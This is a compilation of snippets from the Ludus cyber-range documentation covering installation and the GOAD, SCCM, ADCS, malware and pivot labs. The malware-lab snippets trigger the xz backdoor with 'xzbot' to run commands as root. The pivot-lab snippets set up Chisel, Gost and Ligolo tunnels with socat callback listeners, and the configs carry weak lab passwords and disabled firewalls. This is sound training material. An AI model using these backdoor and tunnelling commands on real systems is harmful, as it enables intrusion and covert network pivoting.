### Setup GOAD Project with Ludus Source: https://docs.ludus.cloud/docs/environment-guides/goad-nha This section explains how to clone the GOAD project, install necessary dependencies, set the Ludus API key, and initiate the lab setup using the GOAD script with Ludus integration. It includes commands to check the Ludus environment, set the lab, and install it. ```bash git clone https://github.com/Orange-Cyberdefense/GOAD.git cd GOAD sudo apt install python3.11-venv export LUDUS_API_KEY='myapikey'# put your Ludus admin api key here ./goad.sh -p ludus GOAD/ludus/local > check GOAD/ludus/local > set_lab NHA # GOAD/GOAD-Light/NHA/SCCM GOAD/ludus/local > install ``` -------------------------------- ### Ludus Installation Steps Source: https://docs.ludus.cloud/docs/deployment-options/bare-metal This section outlines the initial steps for installing Ludus on a bare metal machine. It includes installing Debian 12 and setting up RAID0 for multiple drives. ```shell 1. Install Debian 12 - make note of the root and user passwords set during install. Set up RAID0 as shown below if you have multiple drives for greater speed. 2. Follow Install Ludus ``` -------------------------------- ### Start Ludus Testing Mode Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab Initiates testing mode for the Ludus range, enabling features like snapshotting and internet blocking. This command is used to prepare the range for testing scenarios. ```bash ludus testing start ``` -------------------------------- ### Add and Build Ubuntu Template Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab These commands clone the Ludus repository, navigate to the templates directory, add the Ubuntu 20.04 server template, and then build it. This is necessary if the template is not already present on the Ludus host. ```bash git clone https://gitlab.com/badsectorlabs/ludus.git cd ludus/templates ludus templates add -d ubuntu-20.04-x64-server ludus templates build ``` -------------------------------- ### Use Ludus CLI Locally Source: https://docs.ludus.cloud/docs/category/quick-start This section details how to use the Ludus Command Line Interface (CLI) locally. It mentions WireGuard as a related technology, suggesting potential integration or usage patterns within the CLI environment. ```bash Use the CLI locally WireGuard ``` -------------------------------- ### Ludus Installation Script Source: https://docs.ludus.cloud/docs/deployment-options/google-cloud Installs Ludus on a provisioned VM using a curl command to download and execute an installation script. It prompts the user to confirm the installation and carefully review network settings, particularly the public IP address. The script also guides the user on monitoring the installation status and proceeding after a successful reboot. ```shell curl -s https://ludus.cloud/install | bash ``` -------------------------------- ### Chisel Socks Server Setup Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab This section details setting up a Chisel socks server. It includes making the Chisel binary executable, checking for existing web servers, and starting the Chisel server with a backend pointing to a local web server. ```bash ssh root@tom chmod +x ./chisel ``` ```bash ssh root@tom ss -punta ``` ```bash ssh root@tom ./chisel server --backend http://127.0.0.1:8080 --socks5 --reverse --port 80 & ``` ```bash ssh root@tom ss -punta | grep 80 ``` -------------------------------- ### Setup GOAD SCCM Lab with Ludus CLI Source: https://docs.ludus.cloud/docs/environment-guides/goad-sccm This section details the steps to clone the GOAD project, install necessary dependencies, set the Ludus API key, and initiate the SCCM lab deployment using the GOAD script. It also includes commands for checking lab status and setting the lab environment. ```bash git clone https://github.com/Orange-Cyberdefense/GOAD.git cd GOAD sudo apt install python3.11-venv export LUDUS_API_KEY='myapikey'# put your Ludus admin api key here ./goad.sh -p ludus GOAD/ludus/local > check GOAD/ludus/local > set_lab SCCM # GOAD/GOAD-Light/NHA/SCCM GOAD/ludus/local > install ``` -------------------------------- ### Monitor SCCM Installation Log Source: https://docs.ludus.cloud/docs/environment-guides/sccm Monitors the SCCM installation progress by tailing the `ConfigMgrSetup.log` file in real-time. This is useful for observing the installation process on the SCCM site server. ```powershell Get-Content C:\ConfigMgrSetup.log -Wait ``` -------------------------------- ### Deploy Malware Lab Range Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This sequence of commands first sets the Ludus range configuration using a specified YAML file and then deploys the configured range. This is the final step to instantiate the malware lab environment. ```bash ludus range config set-f config.yml ludus range deploy ``` -------------------------------- ### Setup and Deploy GOAD with Ludus Source: https://docs.ludus.cloud/docs/environment-guides/goad Clones the GOAD project, installs Python virtual environment, sets the Ludus API key, and initiates the lab deployment using Ludus. It also includes steps for setting the lab environment and handling potential DNS issues. ```bash git clone https://github.com/Orange-Cyberdefense/GOAD.git cd GOAD sudo apt install python3.11-venv export LUDUS_API_KEY='myapikey'# put your Ludus admin api key here ./goad.sh -p ludus GOAD/ludus/local > check GOAD/ludus/local > set_lab GOAD # GOAD/GOAD-Light/NHA/SCCM GOAD/ludus/local > install ``` -------------------------------- ### Gost KCP Socks Proxy Setup Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab This snippet demonstrates how to set up a KCP socks proxy using Gost. It includes commands to start the Gost server, check listening ports with lsof, and initiate a connection using proxychains. ```bash ssh root@tom "./gost -L socks5+kcp://:8443" & ``` ```bash lsof -i tcp:9050 ``` ```bash ./gost -L=:9050 -F=socks5+kcp://tom:8443 & ``` ```bash lsof -i tcp:9050 ``` ```bash lsof -i tcp:4444 ``` ```bash socat -u tcp-listen:4444,reuseaddr,fork open:/tmp/PROOF,create,append & ``` ```bash cat /tmp/PROOF ``` ```bash proxychains -q callMe.sh linux 80 4444 tcp ``` ```bash cat /tmp/PROOF ``` -------------------------------- ### Verify Command Execution as Root Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This command reads the content of the '/tmp/xz' file to verify that the previously sent command executed with root privileges. ```bash cat /tmp/xz ``` -------------------------------- ### Install jq Package Source: https://docs.ludus.cloud/docs/environment-guides/netexec-workshop-lehack-2024 Installs the jq package using Homebrew if it's not already installed. jq is a lightweight and flexible command-line JSON processor. ```bash brew install jq ``` -------------------------------- ### Ludus SCCM Lab Configuration Example (config.yml) Source: https://docs.ludus.cloud/docs/environment-guides/sccm This YAML configuration file defines the virtual machines and their roles for an SCCM lab environment. It includes settings for domain controllers, workstations, SCCM distribution points, SQL servers, management servers, and the main site server, along with specific SCCM variables. ```yaml ludus: -vm_name:"{{ range_id }}-DC01" hostname:"DC01" template: win2022-server-x64-template vlan:10 ip_last_octet:10 ram_gb:4 ram_min_gb:1 cpus:2 windows: sysprep:true domain: fqdn: ludus.domain role: primary-dc roles: - synzack.ludus_sccm.install_adcs - synzack.ludus_sccm.disable_firewall -vm_name:"{{ range_id }}-Workstation" hostname:"Workstation" template: win11-22h2-x64-enterprise-template vlan:10 ip_last_octet:11 ram_gb:4 ram_min_gb:1 cpus:2 windows: sysprep:true domain: fqdn: ludus.domain role: member roles: - synzack.ludus_sccm.disable_firewall -vm_name:"{{ range_id }}-sccm-distro" hostname:"sccm-distro" template: win2022-server-x64-template vlan:10 ip_last_octet:12 ram_gb:4 ram_min_gb:1 cpus:4 windows: sysprep:true domain: fqdn: ludus.domain role: member roles: - synzack.ludus_sccm.ludus_sccm_distro role_vars: ludus_sccm_site_server_hostname:'sccm-sitesrv' -vm_name:"{{ range_id }}-sccm-sql" hostname:"sccm-sql" template: win2022-server-x64-template vlan:10 ip_last_octet:13 ram_gb:4 ram_min_gb:1 cpus:4 windows: sysprep:true domain: fqdn: ludus.domain role: member roles: - synzack.ludus_sccm.ludus_sccm_sql role_vars: ludus_sccm_site_server_hostname:'sccm-sitesrv' ludus_sccm_sql_server_hostname:'sccm-sql' ludus_sccm_sql_svc_account_username:'sqlsccmsvc' ludus_sccm_sql_svc_account_password:'Password123' -vm_name:"{{ range_id }}-sccm-mgmt" hostname:"sccm-mgmt" template: win2022-server-x64-template vlan:10 ip_last_octet:14 ram_gb:4 ram_min_gb:1 cpus:4 windows: sysprep:true domain: fqdn: ludus.domain role: member roles: - synzack.ludus_sccm.ludus_sccm_mgmt role_vars: ludus_sccm_site_server_hostname:"sccm-sitesrv" -vm_name:"{{ range_id }}-sccm-sitesrv" hostname:"sccm-sitesrv" template: win2022-server-x64-template vlan:10 ip_last_octet:15 ram_gb:4 ram_min_gb:1 cpus:4 windows: sysprep:true autologon_user: domainadmin autologon_password: password domain: fqdn: ludus.domain role: member roles: - synzack.ludus_sccm.ludus_sccm_siteserver - synzack.ludus_sccm.enable_webdav role_vars: ludus_sccm_sitecode:123 ludus_sccm_sitename: Primary Site ludus_sccm_site_server_hostname:'sccm-sitesrv' ludus_sccm_distro_server_hostname:'sccm-distro' ludus_sccm_mgmt_server_hostname:'sccm-mgmt' ludus_sccm_sql_server_hostname:'sccm-sql' # --------------------------NAA Account------------------------------------------------- ludus_sccm_configure_naa:true ludus_sccm_naa_username:'sccm_naa' ludus_sccm_naa_password:'Password123' ``` -------------------------------- ### Start socat Listener Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab Starts a socat listener on TCP port 4444, redirecting traffic to a file named /tmp/PROOF. This is used to monitor callback server activity. ```bash socat -u tcp-listen:4444,reuseaddr,fork open:/tmp/PROOF,create,append ``` -------------------------------- ### Install Custom Packages for Anti-Sandbox Source: https://docs.ludus.cloud/docs/enterprise/anti-sandbox Installs custom QEMU and OVMF packages required for the Ludus Anti-Sandbox feature to function correctly. These packages affect the entire Ludus host. ```bash ludus --url https://127.0.0.1:8081 antisandbox install-custom [INFO] Anti-Sandbox QEMU and OVMF installed - will take effect on VM's next power cycle ``` -------------------------------- ### Install Ludus on Proxmox using Curl Source: https://docs.ludus.cloud/docs/deployment-options/proxmox This snippet shows how to install Ludus on a Proxmox host using a curl command to download and execute the installation script. It also demonstrates how to download the script for review and manual execution. ```bash # All-in-one command curl -s https://ludus.cloud/install |bash # If you want to check out the install script curl https://ludus.cloud/install > install.sh cat install.sh chmod +x install.sh ./install.sh ``` -------------------------------- ### Ligolo Start Listener Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab Starts a listener on the Ligolo server that forwards traffic to a local port (127.0.0.1:11601). This listener uses the same port (11601) that the Ligolo server was initially started with. ```bash listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 ``` -------------------------------- ### Ludus Range Configuration Example Source: https://docs.ludus.cloud/docs/developers/ansible-roles An example of a Ludus range configuration file, demonstrating how to define VM properties, network settings, and role assignments for deployment. ```yaml ludus: -vm_name:"{{ range_id }}-ad-dc-win2022-server-x64-1" hostname:"{{ range_id }}-DC01-2022" template: win2022-server-x64-template vlan:10 ip_last_octet:11 ram_gb:6 cpus:4 windows: sysprep:true domain: fqdn: ludus.domain role: primary-dc roles: - testing_role - a_stable_role - another_stable_role ... ``` -------------------------------- ### Deploy Ludus Range Source: https://docs.ludus.cloud/docs/environment-guides/adcs This command deploys the configured Ludus range, which includes the ADCS lab environment, allowing you to start exploring the defined attack paths. ```bash ludus range deploy ``` -------------------------------- ### Install Go and Build Ludus Server (No Docs) Source: https://docs.ludus.cloud/docs/developers/building-from-source Installs Go on a Debian-based system, sets up the Go environment, clones the Ludus repository, and builds the `ludus-server` binary without embedded documentation. ```bash # Install Go wget https://go.dev/dl/go1.24.0.linux-amd64.tar.gz rm-rf /usr/local/go &&tar-C /usr/local -xzf go1.24.0.linux-amd64.tar.gz exportPATH=$PATH:/usr/local/go/bin # Build Ludus git clone https://gitlab.com/badsectorlabs/ludus.git cd ludus exportGIT_COMMIT_SHORT_HASH=$(git rev-parse --short HEAD) exportVERSION=$(git rev-parse --abbrev-ref HEAD) cd ludus-server GOOS=linux GOARCH=amd64 go build -trimpath-ldflags"-s -w -X main.GitCommitHash=${GIT_COMMIT_SHORT_HASH}-manual-no-docs -X main.VersionString=$VERSION"-o ludus-server ``` -------------------------------- ### Ludus CLI Configuration Example Source: https://docs.ludus.cloud/docs/cli Demonstrates setting the Ludus server URL via an environment variable and executing a verbose version command. It also shows the debug output indicating configuration loading from both environment variables and a config file. ```bash local:~$ LUDUS_URL=https://192.168.1.103:8080 local:~$ ludus version --verbose [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:102 Using config file: /Users/user/.config/ludus/config.yml [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:106 --- Configuration from cli and read from file --- [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 url = https://10.98.108.2:8080 [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 proxy = [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 verify =%!s(bool=false) [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 user = [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 verbose =%!s(bool=true) [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:108 json =%!s(bool=false) [DEBUG] 2024/02/09 15:38:31 ludus/cmd.initConfig:root.go:123 --- ``` -------------------------------- ### Install Ludus on Debian 12 VM Source: https://docs.ludus.cloud/docs/deployment-options/vmware-fusion This section provides instructions on how to install Ludus after setting up the Debian 12 virtual machine in VMware Fusion. It directs users to follow the general Ludus installation guide. ```text Once Debian 12 is installed and running, follow Install Ludus. ``` -------------------------------- ### Start Ludus Template Building Process Source: https://docs.ludus.cloud/docs/quick-start/build-templates Initiates the process of building VM templates from ISO files. This command can take a significant amount of time depending on hardware and network speed. It builds one template at a time by default. ```bash ludus templates build ``` -------------------------------- ### Update Failing Machine in Ludus Source: https://docs.ludus.cloud/docs/environment-guides/goad-sccm This snippet provides a command to update a specific machine within Ludus, which can resolve issues encountered during the SCCM lab installation, particularly related to .Net Framework installation. It shows how to check the update status. ```bash ludus testing update -n GOADd126ca-SCCM-MECM # Replace GOADd126ca with your GOAD UserID # Wait for all updates to be installed. # Be patient, this will take a long time. # When you see the following, the updates are complete: localhost : ok=5 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 GOADd126ca-SCCM-MECM : ok=8 changed=5 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 ``` -------------------------------- ### Build Ludus Client for Current OS/Arch Source: https://docs.ludus.cloud/docs/developers/building-from-source Clones the Ludus repository and builds the `ludus-client` binary for the current operating system and architecture using Go. ```bash git clone https://gitlab.com/badsectorlabs/ludus.git exportGIT_COMMIT_SHORT_HASH=$(git rev-parse --short HEAD) exportVERSION=$(git rev-parse --abbrev-ref HEAD) cd ludus-client go build -trimpath-ldflags"-s -w -X ludus/cmd.GitCommitHash=${GIT_COMMIT_SHORT_HASH}-manual -X main.VersionString=$VERSION" ``` -------------------------------- ### Add Ludus ADCS Role Source: https://docs.ludus.cloud/docs/environment-guides/adcs This command adds the 'badsectorlabs.ludus_adcs' role to your Ludus server, which is necessary for setting up the ADCS lab. ```bash ludus ansible roles add badsectorlabs.ludus_adcs ``` -------------------------------- ### Install Yarn, Go, and Build Ludus Server (With Docs) Source: https://docs.ludus.cloud/docs/developers/building-from-source Installs Yarn and Go on a Debian-based system, configures the Go environment, clones the Ludus repository, builds embedded documentation using Yarn, and then compiles the `ludus-server` binary with documentation included. ```bash # Install yarn echo"deb https://dl.yarnpkg.com/debian/ stable main"|tee /etc/apt/sources.list.d/yarn.list wget -qO- https://dl.yarnpkg.com/debian/pubkey.gpg |tee /etc/apt/trusted.gpg.d/dl.yarnpkg.com.asc apt update aptinstallyarn # Install Go wget https://go.dev/dl/go1.24.0.linux-amd64.tar.gz rm-rf /usr/local/go &&tar-C /usr/local -xzf go1.24.0.linux-amd64.tar.gz exportPATH=$PATH:/usr/local/go/bin # Get the code git clone https://gitlab.com/badsectorlabs/ludus.git cd ludus exportGIT_COMMIT_SHORT_HASH=$(git rev-parse --short HEAD) exportVERSION=$(git rev-parse --abbrev-ref HEAD) # Build the docs cd docs yarninstall yarn build # Remove videos to make the binary smaller rm-f ./build/video/* rm-f ./build/img/hardware/Debian_12_RAID0.mp4 # Move the docs to the location the server expects to embed them mv ./build ../ludus-server/src/docs cd../ludus-server # Build Ludus GOOS=linux GOARCH=amd64 go build -tags=embeddocs -trimpath-ldflags"-s -w -X main.GitCommitHash=${GIT_COMMIT_SHORT_HASH}-manual-with-docs -X main.VersionString=$VERSION"-o ludus-server ``` -------------------------------- ### Troubleshoot Proxmox VE Package Installation Errors Source: https://docs.ludus.cloud/docs/deployment-options/google-cloud This snippet captures the output of an Ansible task failing to install Proxmox VE and related packages. It details the specific error code (100) and the underlying issue with dpkg, including problems with ifupdown2, grub-pc, pve-manager, and proxmox-ve configurations due to dependency issues. ```ansible TASK [lae.proxmox : Install Proxmox VE and related packages] ******************* FAILED - RETRYING: [127.0.0.1]: Install Proxmox VE and related packages (2 retries left). FAILED - RETRYING: [127.0.0.1]: Install Proxmox VE and related packages (1 retries left). fatal: [127.0.0.1]: FAILED! => {"attempts": 2, "cache_update_time": 1708546691, "cache_updated": false, "changed": false, "msg": "'/usr/bin/apt-get -y -o \"Dpkg::Options::=--force-confdef\" -o \"Dpkg::Options::=--force-confold\" install 'proxmox-ve=8.1.0\' failed: E: Sub-process /usr/bin/dpkg returned an error code (1)\n", "rc": 100, "stderr": "E: Sub-process /usr/bin/dpkg returned an error code (1)\n", "stderr_lines": ["E: Sub-process /usr/bin/dpkg returned an error code (1)"], "stdout": "Reading package lists...\nBuilding dependency tree...\nReading state information...\nproxmox-ve is already the newest version (8.1.0).\nThe following package was automatically installed and is no longer required:\n python3-distro-info\nUse 'apt autoremove' to remove it.\n0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.\n4 not fully installed or removed.\nAfter this operation, 0 B of additional disk space will be used.\nSetting up ifupdown2 (3.2.0-1+pmx8) ...\r\n\r\nnetwork config changes have been detected for ifupdown2 compatibility.\r\nSaved in /etc/network/interfaces.new for hot-apply or next reboot.\r\n\r\nReloading network config on first install\r\nerror: Another instance of this program is already running.\r\ndpkg: error processing package ifupdown2 (--configure):\r\n installed ifupdown2 package post-installation script subprocess returned error exit status 89\r\nSetting up grub-pc (2.06-13+pmx1) ...\r\ngrub-pc: Running grub-install ...\r\nYou must correct your GRUB install devices before proceeding:\r\n\r\n DEBIAN_FRONTEND=dialog dpkg --configure grub-pc\r\n dpkg --configure -a\r\ndpkg: error processing package grub-pc (--configure):\r\n installed grub-pc package post-installation script subprocess returned error exit status 1\r\ndpkg: dependency problems prevent configuration of pve-manager:\r\n pve-manager depends on ifupdown2 (>= 3.0) | ifenslave (>= 2.6); however:\r\n Package ifupdown2 is not configured yet.\r\n Package ifenslave is not installed.\r\n\r\ndpkg: error processing package pve-manager (--configure):\r\n dependency problems - leaving unconfigured\r\ndpkg: dependency problems prevent configuration of proxmox-ve:\r\n proxmox-ve depends on pve-manager (>= 8.0.4); however:\r\n Package pve-manager is not configured yet.\r\n\r\ndpkg: error processing package proxmox-ve (--configure):\r\n dependency problems - leaving unconfigured\r\nErrors were encountered while processing:\r\n ifupdown2\r\n grub-pc\r\n pve-manager\r\n proxmox-ve"} ``` -------------------------------- ### Stop Ludus Testing Environment Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This command stops the current Ludus testing session, allowing for cleanup and exit from the testing environment. ```bash ludus testing stop ``` -------------------------------- ### Chisel Build Binaries Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab Instructions for building Chisel binaries, including vendorizing Go modules and creating cross-compiled executables for Windows. ```bash cd tools/chisel ``` ```bash go mod vendor ``` ```bash go build -ldflags "-s -w" ``` ```bash env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w" ``` ```bash scp chisel root@tom: ``` ```bash ssh root@tom chmod +x ./chisel ``` -------------------------------- ### Verify Backdoored Shared Object Linkage Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This command checks the symbolic link for the liblzma shared object to confirm if it points to the patched backdoor version. ```bash ls -lart /usr/lib/x86_64-linux-gnu/liblzma.so.5 ``` -------------------------------- ### Add Ludus Ansible Roles Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This command adds the necessary Ansible roles for the malware lab, including roles for Flare VM, REMnux, and the xz backdoor. ```bash ludus ansible role add badsectorlabs.ludus_flarevm ludus ansible role add badsectorlabs.ludus_remnux ludus ansible role add badsectorlabs.ludus_xz_backdoor ``` -------------------------------- ### Chisel Socks Client Callback Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab Demonstrates establishing a Chisel socks client connection. It involves checking for existing listeners, starting the client with a specified backend and port, and verifying the connection. It also includes steps for setting up a listener for callbacks and using proxychains. ```bash curl tom ``` ```bash curl tom:8080 ``` ```bash lsof -i tcp:9050 ``` ```bash ~/tools/chisel/chisel client tom:80 9050:socks & ``` ```bash lsof -i tcp:9050 ``` ```bash sudo sed -i 's:socks4:socks5:' /etc/proxychains4.conf ``` ```bash lsof -i tcp:4444 ``` ```bash socat -u tcp-listen:4444,fork open:/tmp/PROOF,create,append & ``` ```bash cat /tmp/PROOF ``` ```bash proxychains4 -q callMe.sh linux 80 4444 tcp ``` ```bash cat /tmp/PROOF ``` -------------------------------- ### Install Vulhub Environments on Linux with Ludus Source: https://docs.ludus.cloud/docs/roles This role, badsectorlabs.ludus_vulhub, is designed to run Vulhub environments on a Linux system within the Ludus framework. It facilitates the setup of various vulnerable applications for security testing. ```ansible ansible-galaxy install badsectorlabs.ludus_vulhub ``` -------------------------------- ### Create VM Snapshot with Ludus CLI Source: https://docs.ludus.cloud/docs/environment-guides/netexec-workshop-lehack-2024 Creates a snapshot of the virtual machine using the Ludus command-line interface. The snapshot is named 'clean-setup' and includes a descriptive message indicating it's a clean setup after the Ansible run. ```bash ludus snapshot create clean-setup -d"Clean setup of the netexec lab after ansible run" ``` -------------------------------- ### Execute Command via XZ Bot Source: https://docs.ludus.cloud/docs/environment-guides/malware-lab This command uses 'xzbot' to send a command ('id > /tmp/xz') to the specified server address and port. The output includes hexadecimal data representing the communication. ```bash xzbot -addr '127.0.0.1:22' -cmd 'id > /tmp/xz' ``` -------------------------------- ### Deploy Ludus Range Source: https://docs.ludus.cloud/docs/quick-start/deploy-range Initiates the deployment of the configured Ludus range. This command starts the process of provisioning and setting up the environment based on the active configuration. ```bash ludus range deploy ``` -------------------------------- ### SSF Preparation Source: https://docs.ludus.cloud/docs/environment-guides/pivot-lab Initial steps for preparing the SSF tool, involving changing the directory to the SSF executable. ```bash cd tools/ssf/ssf-linux-x86_64-3.0.0 ``` -------------------------------- ### Ludus Mini PC Builder Configuration Source: https://docs.ludus.cloud/docs/deployment-options/bare-metal This section allows users to configure a Ludus Mini PC by selecting various hardware components. It includes options for chassis, CPU, RAM, and NVMe storage, with specific models and pricing. ```html



``` -------------------------------- ### Configure Ludus SCCM Client Push Source: https://docs.ludus.cloud/docs/environment-guides/sccm Sets various parameters for SCCM client push installations, including enabling client push, specifying username and password, and configuring system type detection. It also allows for NTLM fallback. ```configuration ludus_sccm_configure_client_push:true ludus_sccm_client_push_username:'sccm_push' ludus_sccm_client_push_password:'Password123' ludus_sccm_enable_automatic_client_push_installation:true ludus_sccm_enable_system_type_configuration_manager:true ludus_sccm_enable_system_type_server:true ludus_sccm_enable_system_type_workstation:true ludus_sccm_install_client_to_domain_controller:false ludus_sccm_allow_NTLM_fallback:true ``` -------------------------------- ### Deploy Range with Anti-Sandbox Template Source: https://docs.ludus.cloud/docs/enterprise/anti-sandbox Deploys the configured Ludus range, which now uses the anti-sandbox template. This action initiates the VM deployment process. ```bash ludus range deploy [INFO] Range deploy started ``` -------------------------------- ### Configure Ludus Environment for ADCS Lab Source: https://docs.ludus.cloud/docs/environment-guides/adcs This snippet shows how to retrieve the current Ludus configuration, modify it to include the ADCS role for a Windows server, and then apply the changes. The configuration specifies VM details, domain settings, and assigned roles. ```bash ludus range config get > config.yml ``` ```yaml ludus: - vm_name:"{{ range_id }}-ad-dc-win2022-server-x64-1" hostname:"{{ range_id }}-DC01-2022" template: win2022-server-x64-template vlan:10 ip_last_octet:11 ram_gb:6 cpus:4 windows: sysprep:true domain: fqdn: ludus.domain role: primary-dc roles: - badsectorlabs.ludus_adcs ``` ```bash ludus range config set -f config.yml ```